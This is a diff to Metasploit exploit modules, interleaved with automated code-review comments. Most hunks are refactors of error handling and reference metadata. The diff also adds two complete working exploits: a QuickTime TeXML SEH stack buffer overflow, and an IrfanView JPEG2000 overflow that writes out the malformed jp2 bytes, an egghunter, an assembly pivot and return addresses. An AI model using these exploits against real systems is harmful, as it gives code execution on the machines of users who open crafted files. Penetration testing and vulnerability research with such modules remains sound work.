+++ b/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb
@@ -316,7 +316,7 @@ MsgBox "Welcome! Press F1 to dismiss this dialog.", ,"Welcome!", "#{unc}", 1
#
def exploit
if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/'
- raise RuntimeError, 'Using WebDAV requires SRVPORT=80 and URIPATH=/'
+ fail_with(Exploit::Failure::Unknown, 'Using WebDAV requires SRVPORT=80 and URIPATH=/')
end
path = File.join(Msf::Config.install_root, "data", "exploits", "runcalc.hlp")
diff --git a/modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb b/modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb
index 92cf5856b7..4424e550ae 100644
--- a/modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb
+++ b/modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb
@@ -341,7 +341,7 @@ if (window.navigator.appName == "Microsoft Internet Explorer") {
@img_file = rand_text_alpha(rand(2)+1) + ".gif"
if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/'
- raise RuntimeError, 'Using WebDAV requires SRVPORT=80 and URIPATH=/'
+ fail_with(Exploit::Failure::Unknown, 'Using WebDAV requires SRVPORT=80 and URIPATH=/')
end
super
diff --git a/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb b/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb
index 373bfc4fe1..86e7c70bf6 100644
--- a/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb
+++ b/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb
@@ -442,7 +442,7 @@ class Metasploit3 < Msf::Exploit::Remote
@exploit_dll = rand_text_alpha(rand(8)+4) + ".dll"
if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/'
- raise RuntimeError, 'Using WebDAV requires SRVPORT=80 and URIPATH=/'
+ fail_with(Exploit::Failure::Unknown, 'Using WebDAV requires SRVPORT=80 and URIPATH=/')
end
print_status("Send vulnerable clients to #{@exploit_unc}.")
diff --git a/modules/exploits/windows/browser/ms11_003_ie_css_import.rb b/modules/exploits/windows/browser/ms11_003_ie_css_import.rb
index 194321e5f8..e46bbcc3ea 100644
--- a/modules/exploits/windows/browser/ms11_003_ie_css_import.rb
+++ b/modules/exploits/windows/browser/ms11_003_ie_css_import.rb
@@ -422,7 +422,7 @@ EOS
rop_stack.map! { |e|
if e.kind_of? String
# Meta-replace (RVA)
- raise RuntimeError, "Unable to locate key: \"#{e}\"" if not rvas[e]
+ fail_with(Exploit::Failure::BadConfig, "Unable to locate key: \"#{e}\"") if not rvas[e]
rvas['BaseAddress'] + rvas[e]
elsif e == :unused
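Review bot: The guard added inside the `rop_stack.map!` block duplicates the lookup that `rva2addr` performs in the next hunk of this file, so the message and failure class now have to be kept in sync in two places. Assuming the block runs inside an instance method, the String branch could simply be `rva2addr(rvas, e)`. `BadConfig` is also worth a second look: a key missing from `rvas` appears to be a gap in the module's own table rather than something the user configured. wmi_admintools.rb carries the same pair of hunks. The block starts and ends outside the hunk.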
@@ -447,7 +447,7 @@ EOS
end
def rva2addr(rvas, key)
- raise RuntimeError, "Unable to locate key: \"#{key}\"" if not rvas[key]
+ fail_with(Exploit::Failure::BadConfig, "Unable to locate key: \"#{key}\"") if not rvas[key]
rvas['BaseAddress'] + rvas[key]
end
diff --git a/modules/exploits/windows/browser/pcvue_func.rb b/modules/exploits/windows/browser/pcvue_func.rb
index 5a4247d8a9..6e10e5a0c7 100644
--- a/modules/exploits/windows/browser/pcvue_func.rb
+++ b/modules/exploits/windows/browser/pcvue_func.rb
@@ -34,6 +34,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
+ [ 'CVE', '2008-4915'],
[ 'BID', '49795'],
[ 'URL', 'http://aluigi.altervista.org/adv/pcvue_1-adv.txt'],
],
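Review bot: The added `[ 'CVE', '2008-4915']` does not look consistent with the reference beside it and should be checked against the advisory before merging. Elsewhere in this diff, 2008-era CVEs sit next to BIDs in the 27xxx–32xxx range (for example CVE-2008-5405 with BID 32543), while BID 49795 falls between those and the 2012 entries (BID 51426, BID 53571). A wrong CVE id makes the module map to an unrelated entry in scanners and reports that key on it. If the id is confirmed, a short trailing comment naming the source of the mapping would help the next reviewer.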
diff --git a/modules/exploits/windows/browser/safari_xslt_output.rb b/modules/exploits/windows/browser/safari_xslt_output.rb
index d652d72cc7..e67ba8b8ea 100644
--- a/modules/exploits/windows/browser/safari_xslt_output.rb
+++ b/modules/exploits/windows/browser/safari_xslt_output.rb
@@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote
url = "http://"
url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
- url += ":" + datastore['SRVPORT'] + get_resource() + "/"
+ url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/"
content = <<-EOS
diff --git a/modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb b/modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb
index c4bc738e43..9e7140bd2f 100644
--- a/modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb
+++ b/modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb
@@ -69,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote
payload_url = "http://"
payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
- payload_url += ":" + datastore['SRVPORT'] + get_resource() + "/PAYLOAD"
+ payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/PAYLOAD"
if (request.uri.match(/PAYLOAD/))
return if ((p = regenerate_payload(cli)) == nil)
diff --git a/modules/exploits/windows/browser/symantec_appstream_unsafe.rb b/modules/exploits/windows/browser/symantec_appstream_unsafe.rb
index fe0f55d008..7eff754f6e 100644
--- a/modules/exploits/windows/browser/symantec_appstream_unsafe.rb
+++ b/modules/exploits/windows/browser/symantec_appstream_unsafe.rb
@@ -61,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote
payload_url = "http://"
payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
- payload_url += ":" + datastore['SRVPORT'] + get_resource() + "/payload"
+ payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/payload"
if (request.uri.match(/payload/))
return if ((p = regenerate_payload(cli)) == nil)
diff --git a/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb b/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb
index 23ad1a2a93..e251f12c07 100644
--- a/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb
+++ b/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb
@@ -59,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote
payload_url = "http://"
payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
- payload_url += ":" + datastore['SRVPORT'] + get_resource() + "/payload"
+ payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/payload"
if (request.uri.match(/payload/))
return if ((p = regenerate_payload(cli)) == nil)
diff --git a/modules/exploits/windows/browser/webdav_dll_hijacker.rb b/modules/exploits/windows/browser/webdav_dll_hijacker.rb
index 4bd1b40d62..663f51bb06 100644
--- a/modules/exploits/windows/browser/webdav_dll_hijacker.rb
+++ b/modules/exploits/windows/browser/webdav_dll_hijacker.rb
@@ -368,7 +368,7 @@ class Metasploit3 < Msf::Exploit::Remote
@exploit_unc = "\\\\#{myhost}\\"
if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/'
- raise RuntimeError, 'Using WebDAV requires SRVPORT=80 and URIPATH=/'
+ fail_with(Exploit::Failure::Unknown, 'Using WebDAV requires SRVPORT=80 and URIPATH=/')
end
print_status("Exploit links are now available at #{@exploit_unc}#{datastore['SHARENAME']}\\")
diff --git a/modules/exploits/windows/browser/wmi_admintools.rb b/modules/exploits/windows/browser/wmi_admintools.rb
index 4d9284c0b0..d3304956d8 100644
--- a/modules/exploits/windows/browser/wmi_admintools.rb
+++ b/modules/exploits/windows/browser/wmi_admintools.rb
@@ -291,7 +291,7 @@ EOS
rop_stack.map! { |e|
if e.kind_of? String
# Meta-replace (RVA)
- raise RuntimeError, "Unable to locate key: \"#{e}\"" if not rvas[e]
+ fail_with(Exploit::Failure::BadConfig, "Unable to locate key: \"#{e}\"") if not rvas[e]
rvas['BaseAddress'] + rvas[e]
elsif e == :unused
@@ -316,7 +316,7 @@ EOS
end
def rva2addr(rvas, key)
- raise RuntimeError, "Unable to locate key: \"#{key}\"" if not rvas[key]
+ fail_with(Exploit::Failure::BadConfig, "Unable to locate key: \"#{key}\"") if not rvas[key]
rvas['BaseAddress'] + rvas[key]
end
diff --git a/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb b/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb
index 5db120f064..18f7d8171a 100644
--- a/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb
+++ b/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb
@@ -64,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote
payload_url = "http://"
payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
- payload_url += ":" + datastore['SRVPORT'] + get_resource() + "/payload"
+ payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/payload"
if (request.uri.match(/payload/))
return if ((p = regenerate_payload(cli)) == nil)
diff --git a/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb b/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb
index 1a8f90c58c..3207600ac7 100644
--- a/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb
+++ b/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb
@@ -332,7 +332,7 @@ class Metasploit3 < Msf::Exploit::Remote
@exploit_exe = rand_text_alpha(rand(8)+4) + ".exe"
if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/'
- raise RuntimeError, 'Using WebDAV requires SRVPORT=80 and URIPATH=/'
+ fail_with(Exploit::Failure::Unknown, 'Using WebDAV requires SRVPORT=80 and URIPATH=/')
end
msg = Rex::MIME::Message.new
diff --git a/modules/exploits/windows/email/ms10_045_outlook_ref_resolve.rb b/modules/exploits/windows/email/ms10_045_outlook_ref_resolve.rb
index eaf2688fd2..e999b8060f 100644
--- a/modules/exploits/windows/email/ms10_045_outlook_ref_resolve.rb
+++ b/modules/exploits/windows/email/ms10_045_outlook_ref_resolve.rb
@@ -330,7 +330,7 @@ class Metasploit3 < Msf::Exploit::Remote
@exploit_exe = rand_text_alpha(rand(8)+4) + ".exe"
if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/'
- raise RuntimeError, 'Using WebDAV requires SRVPORT=80 and URIPATH=/'
+ fail_with(Exploit::Failure::Unknown, 'Using WebDAV requires SRVPORT=80 and URIPATH=/')
end
msg = Rex::MIME::Message.new
diff --git a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb
index 5019a71703..97b43e79e9 100644
--- a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb
+++ b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb
@@ -79,10 +79,14 @@ class Metasploit3 < Msf::Exploit::Remote
startxrefs = pdf_objects[2]
root_obj = pdf_objects[3]
- output = basic_social_engineering_exploit(xref_trailers,root_obj,stream,trailers,file_name,exe_name,startxrefs.last)
+ begin
+ output = basic_social_engineering_exploit(xref_trailers,root_obj,stream,trailers,file_name,exe_name,startxrefs.last)
- print_status("Creating '#{datastore['FILENAME']}' file...")
- file_create(output)
+ print_status("Creating '#{datastore['FILENAME']}' file...")
+ file_create(output)
+ rescue KeyError => e
+ print_error("Incompatible PDF structure: #{e.message}. Please try a different PDF.")
+ end
end
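Review bot: The new `begin`/`rescue KeyError` wraps `file_create(output)` as well as the parsing call, so a KeyError raised while writing the file would be reported as "Incompatible PDF structure". The handler also only calls `print_error`, so the run appears to end normally (the method's tail is not fully visible here), unlike the `fail_with` convention used across the rest of this commit. Keep just the `basic_social_engineering_exploit(...)` call inside `begin`, move `print_status` and `file_create` below the `end`, and make the handler `fail_with(Exploit::Failure::BadConfig, "Incompatible PDF structure: #{e.message}. Please try a different PDF.")`. The enclosing method starts outside the hunk.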
diff --git a/modules/exploits/windows/fileformat/apple_quicktime_texml.rb b/modules/exploits/windows/fileformat/apple_quicktime_texml.rb
new file mode 100644
index 0000000000..e20d673938
--- /dev/null
+++ b/modules/exploits/windows/fileformat/apple_quicktime_texml.rb
@@ -0,0 +1,134 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::FILEFORMAT
+ include Msf::Exploit::Remote::Seh
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Apple QuickTime TeXML Style Element Stack Buffer Overflow',
+ 'Description' => %q{
+ This module exploits a vulnerability found in Apple QuickTime. When handling
+ a TeXML file, it is possible to trigger a stack-based buffer overflow, and then
+ gain arbitrary code execution under the context of the user. This is due to the
+ QuickTime3GPP.gtx component not handling certain Style subfields properly, storing
+ user-supplied data on the stack, which results the overflow.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Alexander Gavrun', # Vulnerability Discovery
+ 'sinn3r', # Metasploit Module
+ 'juan vazquez' # Metasploit Module
+ ],
+ 'References' =>
+ [
+ [ 'OSVDB', '81934' ],
+ [ 'CVE', '2012-0663' ],
+ [ 'BID', '53571' ],
+ [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-107/' ],
+ [ 'URL', 'http://support.apple.com/kb/HT1222' ]
+ ],
+ 'Payload' =>
+ {
+ 'DisableNops' => true,
+ 'BadChars' => "\x00\x23\x25\x3c\x3e\x7d"
+ },
+ 'Platform' => 'win',
+ 'Targets' =>
+ [
+ [ 'QuickTime 7.7.1 on Windows XP SP3',
+ {
+ 'Ret' => 0x66f1bdf8, # POP ESI/POP EDI/RET from QuickTime.qts (7.71.80.42)
+ 'Offset' => 643,
+ 'Max' => 13508
+ }
+ ],
+ [ 'QuickTime 7.7.0 on Windows XP SP3',
+ {
+ 'Ret' => 0x66F1BD66, # PPR from QuickTime.qts (7.70.80.34)
+ 'Offset' => 643,
+ 'Max' => 13508
+ }
+ ],
+ [ 'QuickTime 7.6.9 on Windows XP SP3',
+ {
+ 'Ret' => 0x66801042, # PPR from QuickTime.qts (7.69.80.9)
+ 'Offset' => 643,
+ 'Max' => 13508
+ }
+ ],
+ ],
+ 'Privileged' => false,
+ 'DisclosureDate' => 'May 15 2012'))
+
+ register_options(
+ [
+ OptString.new('FILENAME', [ true, 'The file name.', 'msf.xml']),
+ ], self.class)
+ end
+
+ def exploit
+ my_payload = rand_text(target['Offset'])
+ my_payload << generate_seh_record(target.ret)
+ my_payload << payload.encoded
+ my_payload << rand_text(target['Max'] - my_payload.length)
+
+ texml = <<-eos
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ What you need... Metasploit!
+
+
+
+
+
+ eos
+
+ texml = texml.gsub(/^\t\t/,'')
+
+ print_status("Creating '#{datastore['FILENAME']}'.")
+ file_create(texml)
+ end
+
+end
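Review bot: The module description ends with `which results the overflow`, which is missing a word; it should read `which results in the overflow`. The template is dedented afterwards with `texml.gsub(/^\t\t/,'')`, which silently does nothing if the heredoc is ever re-indented with spaces. A comment on that line such as `# template lines must stay tab-indented for this strip to apply` would make the dependency explicit. The last entry of `'Targets'` and the `register_options` array also keep trailing commas that other hunks in this commit remove.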
diff --git a/modules/exploits/windows/fileformat/cain_abel_4918_rdp.rb b/modules/exploits/windows/fileformat/cain_abel_4918_rdp.rb
index 8fe97b02ba..57da50d708 100644
--- a/modules/exploits/windows/fileformat/cain_abel_4918_rdp.rb
+++ b/modules/exploits/windows/fileformat/cain_abel_4918_rdp.rb
@@ -31,8 +31,8 @@ class Metasploit3 < Msf::Exploit::Remote
[
[ 'CVE', '2008-5405' ],
[ 'OSVDB', '50342' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/7329' ],
- [ 'BID', '32543' ],
+ [ 'EDB', '7329' ],
+ [ 'BID', '32543' ]
],
'Payload' =>
{
diff --git a/modules/exploits/windows/fileformat/deepburner_path.rb b/modules/exploits/windows/fileformat/deepburner_path.rb
index 3876c04d38..c1b15fc9ce 100644
--- a/modules/exploits/windows/fileformat/deepburner_path.rb
+++ b/modules/exploits/windows/fileformat/deepburner_path.rb
@@ -40,9 +40,9 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'BID', '21657' ],
[ 'OSVDB', '32356' ],
[ 'CVE', '2006-6665' ],
- [ 'URL', 'http://milw0rm.com/exploits/2950' ],
- [ 'URL', 'http://milw0rm.com/exploits/8335' ],
- [ 'EDB', 11315 ]
+ [ 'EDB', '2950' ],
+ [ 'EDB', '8335' ],
+ [ 'EDB', '11315' ]
],
'Payload' =>
{
diff --git a/modules/exploits/windows/fileformat/destinymediaplayer16.rb b/modules/exploits/windows/fileformat/destinymediaplayer16.rb
index 27b5d41180..537a2ddca5 100644
--- a/modules/exploits/windows/fileformat/destinymediaplayer16.rb
+++ b/modules/exploits/windows/fileformat/destinymediaplayer16.rb
@@ -30,8 +30,8 @@ class Metasploit3 < Msf::Exploit::Remote
[
[ 'CVE', '2009-3429' ],
[ 'OSVDB', '53249' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/7651' ],
- [ 'BID', '33091' ],
+ [ 'EDB', '7651' ],
+ [ 'BID', '33091' ]
],
'Payload' =>
{
diff --git a/modules/exploits/windows/fileformat/fatplayer_wav.rb b/modules/exploits/windows/fileformat/fatplayer_wav.rb
index 92ec8c9c59..273a625db8 100644
--- a/modules/exploits/windows/fileformat/fatplayer_wav.rb
+++ b/modules/exploits/windows/fileformat/fatplayer_wav.rb
@@ -35,6 +35,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
+ [ 'CVE', '2009-4962'],
[ 'OSVDB', '57343'],
[ 'EDB', 15279 ],
],
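Review bot: `[ 'EDB', 15279 ]` is left as an Integer in this hunk although the commit writes every EDB id it touches as a String, for example `[ 'EDB', '11315' ]` in deepburner_path.rb. For consistency the line should be `[ 'EDB', '15279' ]`, and the trailing comma after it can go as in the neighbouring files. free_mp3_ripper_wav.rb has the same leftover with `11975` and `17727`. Mixed types in the reference table are easy to miss and can break code that compares or formats the ids as strings.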
diff --git a/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb b/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb
index 05d117a1cf..3091c8fe17 100644
--- a/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb
+++ b/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb
@@ -31,7 +31,7 @@ class Metasploit3 < Msf::Exploit::Remote
],
'References' =>
[
- [ 'OSVDG', '63349' ],
+ [ 'OSVDB', '63349' ],
[ 'EDB', 11975 ], #Initial disclosure
[ 'EDB', 17727 ] #This exploit is based on this poc
],
diff --git a/modules/exploits/windows/fileformat/ht_mp3player_ht3_bof.rb b/modules/exploits/windows/fileformat/ht_mp3player_ht3_bof.rb
index ccd2b7ee99..aa74b56039 100644
--- a/modules/exploits/windows/fileformat/ht_mp3player_ht3_bof.rb
+++ b/modules/exploits/windows/fileformat/ht_mp3player_ht3_bof.rb
@@ -40,8 +40,8 @@ class Metasploit3 < Msf::Exploit::Remote
[
[ 'CVE', '2009-2485' ],
[ 'OSVDB', '55449' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/9034' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/9038' ],
+ [ 'EDB', '9034' ],
+ [ 'EDB', '9038' ]
],
'DefaultOptions' =>
{
diff --git a/modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb b/modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb
new file mode 100644
index 0000000000..9e7d9fff68
--- /dev/null
+++ b/modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb
@@ -0,0 +1,216 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::FILEFORMAT
+ include Msf::Exploit::Remote::Egghunter
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Irfanview JPEG2000 <= v4.3.2.0 jp2 Stack Buffer Overflow',
+ 'Description' => %q{
+ This module exploits a stack-based buffer overflow vulnerability in
+ version <= 4.3.2.0 of Irfanview's JPEG2000.dll plugin. This exploit has been
+ tested on a specific version of irfanview (v4.3.2), although other versions may
+ work also. The vulnerability is triggered via parsing an invalid qcd chunk
+ structure and specifying a malformed qcd size and data.
+
+ Payload delivery and vulnerability trigger can be executed in multiple ways.
+ The user can double click the file, use the file dialog, open via the icon
+ and drag/drop the file into Irfanview\'s window. An egg hunter is used for
+ stability.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Parvez Anwar ', # vulnerability discovery
+ 'mr_me ', # msf-fu
+ 'juan vazquez' # more improvements
+ ],
+ 'Version' => '$Revision$',
+ 'References' =>
+ [
+ [ 'CVE', '2012-0897' ],
+ [ 'OSVDB', '78333'],
+ [ 'BID', '51426' ],
+ [ 'URL', 'http://www.greyhathacker.net/?p=525' ],
+ ],
+ 'Platform' => [ 'win' ],
+ 'DefaultOptions' =>
+ {
+ 'EXITFUNC' => 'process',
+ 'InitialAutoRunScript' => 'migrate -f'
+ },
+ 'Payload' =>
+ {
+ 'Space' => 4000,
+ 'DisableNops' => true,
+ },
+ 'Targets' =>
+ [
+ # push esp; retn [i_view32.exe]
+ # http://www.oldapps.com/irfanview.php?old_irfanview=7097
+ # http://irfanview.tuwien.ac.at/plugins/irfanview_plugins_432_setup.exe
+ [ 'Irfanview 4.32 / Plugins 4.32 / Windows Universal', { 'Ret' => 0x004819d8 } ]
+ ],
+ 'DisclosureDate' => 'Jan 16 2012',
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ OptString.new('FILENAME', [ true, 'The output file name.', 'msf.jp2']),
+ ], self.class)
+ end
+
+ # encode our string like unicode except we are not using nulls
+ def encode_bytes(raw_bytes)
+ encoded_bytes = ""
+ 0.step(raw_bytes.length-1, 2) { |i|
+ encoded_bytes << raw_bytes[i+1]
+ encoded_bytes << raw_bytes[i]
+ }
+ return encoded_bytes
+ end
+
+ def exploit
+ jp2 = ""
+ jp2 << "\x00\x00\x00\x0c" #
+ jp2 << "\x6a\x50\x20\x20" # [jP ] <0x6a502020> magic 0xd0a870a,len 12
+ jp2 << "\x0d\x0a\x87\x0a" #
+ jp2 << "\x00\x00\x00\x14" #
+ jp2 << "\x66\x74\x79\x70" #
+ jp2 << "\x6a\x70\x32\x20" #
+ jp2 << "\x00\x00\x00\x00" # MinorVersion = 0 = [\0\0\0\0]
+ jp2 << "\x6a\x70\x32\x20" # Compat = 0x6a703220 = [jp2 ]
+ jp2 << "\x00\x00\x00\x38" #
+ jp2 << "\x75\x75\x69\x64" # [uuid] <0x75756964> len 56 data offset 8
+ jp2 << "\x61\x70\x00\xde\xec\x87" # 56 bytes with start and end tags
+ jp2 << "\xd5\x11\xb2\xed\x00\x50" #
+ jp2 << "\x04\x71\xfd\xdc\xd2\x00" #
+ jp2 << "\x00\x00\x40\x01\x00\x00" #
+ jp2 << "\x00\x00\x00\x00\x60\x09" #
+ jp2 << "\x00\x00\x00\x00\x00\x00" #
+ jp2 << "\x00\x00\x00\x00\x00\x00" #
+ jp2 << "\x00\x00\x30\x00\x00\x00" #
+ jp2 << "\x00\x00\x00\x2d" #
+ jp2 << "\x6a\x70\x32\x68" # [jp2h] <0x6a703268> len 45 data offset 8
+ jp2 << "\x00\x00\x00\x16" #
+ jp2 << "\x69\x68\x64\x72" # [ihdr] <0x69686472> len 22 data offset 8
+ jp2 << "\x00\x00\x00\x0a" # ImageHeight = 10
+ jp2 << "\x00\x00\x00\x0a" # ImageWidth = 10
+ jp2 << "\x00\x03" # NumberOfComponents = 3
+ jp2 << "\x07" # BitsPerComponent = 7
+ jp2 << "\x07" # Compression = 7
+ jp2 << "\x01" # Colorspace = 0x1 = unknown
+ jp2 << "\x00\x00\x00\x00\x0f" #
+ jp2 << "\x63\x6f\x6c\x72" # [colr] <0x636f6c72> len 15 data offset 8
+ jp2 << "\x01" # Method = 1
+ jp2 << "\x00" # Precedence = 0
+ jp2 << "\x00" # ColorSpaceAproximation = 0
+ jp2 << "\x00\x00\x00" # EnumeratedColorSpace = 16 = sRGB
+ jp2 << "\x10\x00\x00\x00\x00" #
+ jp2 << "\x6a\x70\x32\x63" # [jp2c] <0x6a703263> length 0 data offset 8
+ jp2 << "\xff\x4f" # <0xff4f=JP2C_SOC> Start of codestream
+ jp2 << "\xff\x51" # <0xff51=JP2C_SIZ> length 47
+ jp2 << "\x00\x2f" # 47 bytes
+ jp2 << "\x00\x00" # Capabilities = 0
+ jp2 << "\x00\x00\x00\x0a" # GridWidth = 10
+ jp2 << "\x00\x00\x00\x0a" # GridHeight = 10
+ jp2 << "\x00\x00\x00\x00" # XImageOffset = 0
+ jp2 << "\x00\x00\x00\x00" # YImageOffset = 0
+ jp2 << "\x00\x00\x00\x0a" # TileWidth = 10
+ jp2 << "\x00\x00\x00\x0a" # TileHeight = 10
+ jp2 << "\x00\x00\x00\x00" # Xtileoffset = 0
+ jp2 << "\x00\x00\x00\x00" # Ytileoffset = 0
+ jp2 << "\x00\x03" # NumberOfComponents = 3
+ jp2 << "\x07\x01\x01" # Component0Pr=0x7=8 bits un,hsep=1,vsep=1
+ jp2 << "\x07\x01\x01" # Component0Pr=0x7=8 bits un,hsep=1,vsep=1
+ jp2 << "\x07\x01\x01" # Component0Pr=0x7=8 bits un,hsep=1,vsep=1
+ jp2 << "\xff\x52" # <0xff52=JP2C_COD> length 12
+ jp2 << "\x00\x0c" # 12 bytes
+ jp2 << "\x00" # codingStyle=0=entropy coder w/o partition
+ jp2 << "\x00" # ProgressionOrder = 0
+ jp2 << "\x00\x05" # NumberOfLayers = 0x5
+ jp2 << "\x01" # MultiComponentTransform=0x1=5/3 reversible
+ jp2 << "\x05" # DecompLevels = 5
+ jp2 << "\x04" # CodeBlockWidthExponent=0x4+2 # cbw ->64
+ jp2 << "\x04" # CodeBlockHeightExponent=0x4+2 # cbh ->64
+ jp2 << "\x00" # CodeBLockStyle = 0
+ jp2 << "\x00" # QMIFBankId = 0
+
+ eggoptions =
+ {
+ :checksum => false,
+ :eggtag => 'pwnd'
+ }
+
+ hunter,egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions)
+ qcd_data = ""
+ qcd_data << make_nops(10)
+ qcd_data << encode_bytes(hunter)
+ qcd_data << rand_text_alpha(146)
+
+ jmp_hunter = %q{
+ jmp $-0xad
+ inc ecx
+ }
+
+ # jump to our egghunter
+ jmp_hunter = Metasm::Shellcode.assemble(Metasm::Ia32.new, jmp_hunter).encode_string
+
+ qcd_data << encode_bytes(jmp_hunter)
+ qcd_data << rand_text_alpha(196-qcd_data.length)
+ qcd_data << encode_bytes([target.ret].pack("V"))
+
+ # align ecx and jmp
+ pivot = %q{
+ inc ch
+ jmp ecx
+ }
+
+ pivot = Metasm::Shellcode.assemble(Metasm::Ia32.new, pivot).encode_string
+
+ qcd_data << encode_bytes(pivot)
+ qcd_data << egg
+
+ jp2 << "\xff\x5c" # start
+ jp2 << "\x00\xf5" # arbitrary size to trigger overflow
+ jp2 << "\x22" # guard
+ jp2 << qcd_data # malicious code
+ jp2 << "\xff\x90" # <0xff90=JP2C_SOT>len 10
+ jp2 << "\x00\x0a" # 10 bytes
+ jp2 << "\x00\x00\x00\x00\x00\x68\x00\x01"
+ jp2 << "\xff\x93" # <0xff93=JP2C_SOD> Start of data
+ jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
+ jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
+ jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
+ jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
+ jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
+ jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
+ jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
+ jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
+ jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
+ jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
+ jp2 << "\x80\x80\x80\x80\x80\x80\x80\x80"
+ jp2 << "\x80\x80"
+ jp2 << "\xff\xd9"
+
+ # Create the file
+ print_status("Creating '#{datastore['FILENAME']}' file...")
+
+ file_create(jp2)
+ end
+
+end
